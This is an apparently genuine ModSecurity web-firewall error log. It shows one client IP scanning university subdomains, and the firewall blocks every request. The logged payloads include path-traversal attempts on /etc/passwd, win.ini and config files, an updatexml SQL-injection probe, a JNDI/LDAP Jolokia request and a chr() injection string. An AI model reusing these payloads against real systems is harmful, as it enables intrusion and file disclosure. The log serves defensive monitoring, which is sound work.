[unique_id "ZO130sCo-f0AAAh7wsMAAAA5"]
[Tue Aug 29 11:45:06.365650 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{\\r\\n   "type":"read",\\r\\n   "mbean":"java.lang:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x0d\\x0a   \\x22 found within ARGS:{\\x5cr\\x5cn   \\x22type\\x22:\\x22read\\x22,\\x5cr\\x5cn   \\x22mbean\\x22:\\x22java.lang:type: Memory\\x22,\\x0d\\x0a   \\x22target\\x22:{\\x0d\\x0a      \\x22url\\x22:\\x22service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\\x22\\x0d\\x0a   }\\x0d\\x0a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/jolokia/read/getDiagnosticOptions"] [unique_id "ZO130sCo-f0AAAfGahYAAAAT"]
[Tue Aug 29 11:45:06.375223 2023] [:error] [pid 2156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:student_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:student_id: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/TransferredOutModal.php"] [unique_id "ZO130sCo-f0AAAhsnhAAAAAp"]
[Tue Aug 29 11:45:06.376081 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{\\r\\n   "type":"read",\\r\\n   "mbean":"java.lang:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x0d\\x0a   \\x22 found within ARGS:{\\x5cr\\x5cn   \\x22type\\x22:\\x22read\\x22,\\x5cr\\x5cn   \\x22mbean\\x22:\\x22java.lang:type: Memory\\x22,\\x0d\\x0a   \\x22target\\x22:{\\x0d\\x0a      \\x22url\\x22:\\x22service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\\x22\\x0d\\x0a   }\\x0d\\x0a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/jolokia/read/getDiagnosticOptions"] [unique_id "ZO130sCo-f0AAAfg760AAAAe"]
[Tue Aug 29 11:45:06.392105 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{\\r\\n   "type":"read",\\r\\n   "mbean":"java.lang:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x0d\\x0a   \\x22 found within ARGS:{\\x5cr\\x5cn   \\x22type\\x22:\\x22read\\x22,\\x5cr\\x5cn   \\x22mbean\\x22:\\x22java.lang:type: Memory\\x22,\\x0d\\x0a   \\x22target\\x22:{\\x0d\\x0a      \\x22url\\x22:\\x22service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\\x22\\x0d\\x0a   }\\x0d\\x0a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/jolokia/read/getDiagnosticOptions"] [unique_id "ZO130sCo-f0AAARphJ4AAAAU"]
[Tue Aug 29 11:45:06.401469 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130sCo-f0AAAe3@JUAAAAA"]
[Tue Aug 29 11:45:06.403862 2023] [:error] [pid 2111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:student_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:student_id: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/TransferredOutModal.php"] [unique_id "ZO130sCo-f0AAAg-pNkAAAAR"]
[Tue Aug 29 11:45:06.411930 2023] [:error] [pid 2029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130sCo-f0AAAftVIoAAAAf"]
[Tue Aug 29 11:45:07.367819 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:patron_only_image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:patron_only_image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO1308Co-f0AAAdOehkAAAAS"]
[Tue Aug 29 11:45:07.373534 2023] [:error] [pid 2159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{\\r\\n   "type":"read",\\r\\n   "mbean":"java.lang:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x0d\\x0a   \\x22 found within ARGS:{\\x5cr\\x5cn   \\x22type\\x22:\\x22read\\x22,\\x5cr\\x5cn   \\x22mbean\\x22:\\x22java.lang:type: Memory\\x22,\\x0d\\x0a   \\x22target\\x22:{\\x0d\\x0a      \\x22url\\x22:\\x22service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\\x22\\x0d\\x0a   }\\x0d\\x0a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/jolokia/read/getDiagnosticOptions"] [unique_id "ZO1308Co-f0AAAhvjVUAAAAs"]
[Tue Aug 29 11:45:07.392264 2023] [:error] [pid 2029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:patron_only_image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:patron_only_image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO1308Co-f0AAAftVIsAAAAf"]
[Tue Aug 29 11:45:07.394997 2023] [:error] [pid 2159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:patron_only_image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:patron_only_image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO1308Co-f0AAAhvjVYAAAAs"]
[Tue Aug 29 11:45:07.427231 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:patron_only_image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:patron_only_image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO1308Co-f0AAAe3@JgAAAAA"]
[Tue Aug 29 11:45:07.447714 2023] [:error] [pid 2124] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:patron_only_image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:patron_only_image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO1308Co-f0AAAhMtWAAAAAM"]
[Tue Aug 29 11:45:08.365205 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:student_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:student_id: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/TransferredOutModal.php"] [unique_id "ZO131MCo-f0AAAhgoGIAAAAb"]
[Tue Aug 29 11:45:08.389413 2023] [:error] [pid 2138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:patron_only_image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:patron_only_image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO131MCo-f0AAAhab9cAAAAW"]
[Tue Aug 29 11:45:10.374966 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO131sCo-f0AAAe3@J0AAAAA"]
[Tue Aug 29 11:45:10.379853 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO131sCo-f0AAAhT3wYAAAAD"]
[Tue Aug 29 11:45:10.386433 2023] [:error] [pid 2167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO131sCo-f0AAAh3f6kAAAA1"]
[Tue Aug 29 11:45:10.406447 2023] [:error] [pid 2138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:redirect: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO131sCo-f0AAAhab9oAAAAW"]
[Tue Aug 29 11:45:10.408990 2023] [:error] [pid 2168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO131sCo-f0AAAh4DXgAAAA2"]
[Tue Aug 29 11:45:10.425871 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO131sCo-f0AAAe3@J8AAAAA"]
[Tue Aug 29 11:45:11.367656 2023] [:error] [pid 2171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO1318Co-f0AAAh7ws4AAAA5"]
[Tue Aug 29 11:45:11.368043 2023] [:error] [pid 2153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO1318Co-f0AAAhpwPMAAAAm"]
[Tue Aug 29 11:45:11.380356 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO1318Co-f0AAAc4E4EAAAAP"]
[Tue Aug 29 11:45:11.387637 2023] [:error] [pid 2164] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO1318Co-f0AAAh0rUYAAAAy"]
[Tue Aug 29 11:45:11.447048 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO1318Co-f0AAAdOeiAAAAAS"]
[Tue Aug 29 11:45:11.464437 2023] [:error] [pid 2153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO1318Co-f0AAAhpwPQAAAAm"]
[Tue Aug 29 11:45:12.360974 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:id: ../../Conf/config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO132MCo-f0AAAfbkwAAAAAZ"]
[Tue Aug 29 11:45:12.361415 2023] [:error] [pid 2160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:id: ../../Conf/config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO132MCo-f0AAAhwxlwAAAAt"]
[Tue Aug 29 11:45:12.379667 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:id: ../../Conf/config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO132MCo-f0AAAdOeiEAAAAS"]
[Tue Aug 29 11:45:12.389703 2023] [:error] [pid 2159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO132MCo-f0AAAhvjV4AAAAs"]
[Tue Aug 29 11:45:12.390877 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:url: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO132MCo-f0AAAhlz34AAAAi"]
[Tue Aug 29 11:45:12.407699 2023] [:error] [pid 2150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:id: ../../Conf/config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO132MCo-f0AAAhmFQkAAAAj"]
[Tue Aug 29 11:45:12.438926 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:id: ../../Conf/config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO132MCo-f0AAAhoHLoAAAAl"]
[Tue Aug 29 11:45:13.356029 2023] [:error] [pid 2161] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: etc/passwd\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO132cCo-f0AAAhxwlcAAAAv"]
[Tue Aug 29 11:45:13.375000 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO132cCo-f0AAAdOeiMAAAAS"]
[Tue Aug 29 11:45:13.383486 2023] [:error] [pid 2164] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO132cCo-f0AAAh0rUkAAAAy"]
[Tue Aug 29 11:45:13.392356 2023] [:error] [pid 2150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:id: ../../Conf/config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO132cCo-f0AAAhmFQoAAAAj"]
